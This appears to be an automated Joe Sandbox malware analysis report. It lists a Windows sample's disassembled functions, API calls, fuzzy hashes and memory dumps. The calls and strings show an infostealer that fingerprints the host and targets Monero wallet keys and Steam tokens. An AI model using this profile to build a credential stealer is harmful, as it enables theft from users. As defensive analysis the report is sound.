Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: d1006861fd5ebba4868f91b2197bd4962abbc3d02fb320116c3d192a740483de
Instruction ID: c8ee2fd203bf8d0e38071e79d4eeaee163bfcfed67fe2ddacaf82c0a103582ac
Opcode Fuzzy Hash: d1006861fd5ebba4868f91b2197bd4962abbc3d02fb320116c3d192a740483de
Instruction Fuzzy Hash: 61815775A10248AFCB1CEF68C995AEDB7B5FF94300F508519E409DF351DB30AA06CB92

Function 008B9470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 008B9484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 008B94A5
CloseHandle.KERNEL32(00000000), ref: 008B94AF

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 7743b7cf9a7ffddb1043e755a3a8d39c1cabc2bd074d3a68cfa3de0508ffccea
Instruction ID: f3cf9021665b343224a409cdf09b6750be48a1ea510ec35d8d26c948d319e90f
Opcode Fuzzy Hash: 7743b7cf9a7ffddb1043e755a3a8d39c1cabc2bd074d3a68cfa3de0508ffccea
Instruction Fuzzy Hash: 0BF03A7490020CBBDB04DFE4DC8AFE97778EB08700F004498BA099B290DAB06A86CB91

Function 008A1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 008A112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 008A1132
ExitProcess.KERNEL32 ref: 008A1143

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: fadc52dfd8a2892281694684a9d38ae779e0d918087dc0a962c73b02442e99f1
Instruction ID: a6b8f180a06f4b8cfe82bb5767efe781728606f19fa55d19619b35d37240cbe5
Opcode Fuzzy Hash: fadc52dfd8a2892281694684a9d38ae779e0d918087dc0a962c73b02442e99f1
Instruction Fuzzy Hash: 83E08670945348FFEB10EBE09C4EB087AB8EB04B01F104044F708BA5C0D6B43601979A

Function 008B1A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

Part of subcall function 008B7500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 008B7542
Part of subcall function 008B7500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008B757F
Part of subcall function 008B7500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B7603
Part of subcall function 008B7500: RtlAllocateHeap.NTDLL(00000000), ref: 008B760A

Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982

Part of subcall function 008B7690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B76A4
Part of subcall function 008B7690: RtlAllocateHeap.NTDLL(00000000), ref: 008B76AB

Part of subcall function 008B77C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,008BDBC0,000000FF,?,008B1C99,00000000,?,0127DC18,00000000,?), ref: 008B77F2
Part of subcall function 008B77C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,008BDBC0,000000FF,?,008B1C99,00000000,?,0127DC18,00000000,?), ref: 008B77F9

Part of subcall function 008B7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008A11B7), ref: 008B7880
Part of subcall function 008B7850: RtlAllocateHeap.NTDLL(00000000), ref: 008B7887
Part of subcall function 008B7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 008B789F

Part of subcall function 008B78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B7910
Part of subcall function 008B78E0: RtlAllocateHeap.NTDLL(00000000), ref: 008B7917
Part of subcall function 008B78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 008B792F

Part of subcall function 008B7980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,008C0E00,00000000,?), ref: 008B79B0
Part of subcall function 008B7980: RtlAllocateHeap.NTDLL(00000000), ref: 008B79B7
Part of subcall function 008B7980: GetLocalTime.KERNEL32(?,?,?,?,?,008C0E00,00000000,?), ref: 008B79C4
Part of subcall function 008B7980: wsprintfA.USER32 ref: 008B79F3

Part of subcall function 008B7A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0127E020,00000000,?,008C0E10,00000000,?,00000000,00000000), ref: 008B7A63
Part of subcall function 008B7A30: RtlAllocateHeap.NTDLL(00000000), ref: 008B7A6A
Part of subcall function 008B7A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0127E020,00000000,?,008C0E10,00000000,?,00000000,00000000,?), ref: 008B7A7D

Part of subcall function 008B7B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,0127E020,00000000,?,008C0E10,00000000,?,00000000,00000000), ref: 008B7B35

Part of subcall function 008B7B90: GetKeyboardLayoutList.USER32(00000000,00000000,008C05AF), ref: 008B7BE1
Part of subcall function 008B7B90: LocalAlloc.KERNEL32(00000040,?), ref: 008B7BF9
Part of subcall function 008B7B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 008B7C0D
Part of subcall function 008B7B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 008B7C62
Part of subcall function 008B7B90: LocalFree.KERNEL32(00000000), ref: 008B7D22

Part of subcall function 008B7D80: GetSystemPowerStatus.KERNEL32(?), ref: 008B7DAD

GetCurrentProcessId.KERNEL32(00000000,?,0127DB58,00000000,?,008C0E24,00000000,?,00000000,00000000,?,0127DF60,00000000,?,008C0E20,00000000), ref: 008B207E

Part of subcall function 008B9470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 008B9484
Part of subcall function 008B9470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 008B94A5
Part of subcall function 008B9470: CloseHandle.KERNEL32(00000000), ref: 008B94AF

Part of subcall function 008B7E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B7E37
Part of subcall function 008B7E00: RtlAllocateHeap.NTDLL(00000000), ref: 008B7E3E
Part of subcall function 008B7E00: RegOpenKeyExA.KERNEL32(80000002,0126BF40,00000000,00020119,?), ref: 008B7E5E
Part of subcall function 008B7E00: RegQueryValueExA.KERNEL32(?,0127DA98,00000000,00000000,000000FF,000000FF), ref: 008B7E7F
Part of subcall function 008B7E00: RegCloseKey.ADVAPI32(?), ref: 008B7E92

Part of subcall function 008B7F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 008B7FC9
Part of subcall function 008B7F60: GetLastError.KERNEL32 ref: 008B7FD8

Part of subcall function 008B7ED0: GetSystemInfo.KERNEL32(008C0E2C), ref: 008B7F00
Part of subcall function 008B7ED0: wsprintfA.USER32 ref: 008B7F16

Part of subcall function 008B8100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0127E098,00000000,?,008C0E2C,00000000,?,00000000), ref: 008B8130
Part of subcall function 008B8100: RtlAllocateHeap.NTDLL(00000000), ref: 008B8137
Part of subcall function 008B8100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 008B8158
Part of subcall function 008B8100: wsprintfA.USER32 ref: 008B81AC

Part of subcall function 008B87C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,008C0E28,00000000,?), ref: 008B882F
Part of subcall function 008B87C0: RtlAllocateHeap.NTDLL(00000000), ref: 008B8836
Part of subcall function 008B87C0: wsprintfA.USER32 ref: 008B8850

Part of subcall function 008B8320: RegOpenKeyExA.KERNEL32(00000000,0127B020,00000000,00020019,00000000,008C05B6), ref: 008B83A4

Part of subcall function 008B8320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 008B8426
Part of subcall function 008B8320: wsprintfA.USER32 ref: 008B8459
Part of subcall function 008B8320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 008B847B
Part of subcall function 008B8320: RegCloseKey.ADVAPI32(00000000), ref: 008B848C
Part of subcall function 008B8320: RegCloseKey.ADVAPI32(00000000), ref: 008B8499

Part of subcall function 008B8680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,008C05B7), ref: 008B86CA
Part of subcall function 008B8680: Process32First.KERNEL32(?,00000128), ref: 008B86DE
Part of subcall function 008B8680: Process32Next.KERNEL32(?,00000128), ref: 008B86F3
Part of subcall function 008B8680: CloseHandle.KERNEL32(?), ref: 008B8761

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 008B265B

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUserlstrcatlstrlen$AllocComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 60318822-0
Opcode ID: bbd62a48e49e7e3e330ad47b82cb4532637e0a98b9d5a4e440b51088d144cadd
Instruction ID: a57edd8d0a7ea26fdab509c4e808ce499e7343539ecafae3d624b15068ad3e83
Opcode Fuzzy Hash: bbd62a48e49e7e3e330ad47b82cb4532637e0a98b9d5a4e440b51088d144cadd
Instruction Fuzzy Hash: 08723C72810118BADB1DFB94DCA2EDE7338FF54300F5042A9B516A6661EF306B49CB67

Function 008A6D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3be0671b26688190ab75dde39e099a2fbec9521715369adbcadf5295ef4301c
Instruction ID: 3240d432563a22795cf737171ef616da37ef11f8a4b31acef335d14947004144
Opcode Fuzzy Hash: b3be0671b26688190ab75dde39e099a2fbec9521715369adbcadf5295ef4301c
Instruction Fuzzy Hash: 71611AB4D00218DFEB14CF98D984BEEB7B0FB05304F188598E419A7684E775AEA4DF91

Function 008B70D0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 008B718C

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 3722407311-4138519520
Opcode ID: cf19ecb7fc247c6b5ffed98aba4b43ea94076c448769a656640b508828d82e9e
Instruction ID: 7c026be85b87c9864dc959aa2c025fa4879a4c354d84e35bab99b76c6820117b
Opcode Fuzzy Hash: cf19ecb7fc247c6b5ffed98aba4b43ea94076c448769a656640b508828d82e9e
Instruction Fuzzy Hash: 8C513EB0D04219ABDB24EB94DC95BEEB374FB54304F1040A8E515F6281EB746A88CF69

Function 008B5100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008BA820: lstrlen.KERNEL32(008A4F05,?,?,008A4F05,008C0DDE), ref: 008BA82B
Part of subcall function 008BA820: lstrcpy.KERNEL32(008C0DDE,00000000), ref: 008BA885

lstrlen.KERNEL32(00000000,00000000,008C0ACA), ref: 008B512A

Strings

steam_tokens.txt, xrefs: 008B513F

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
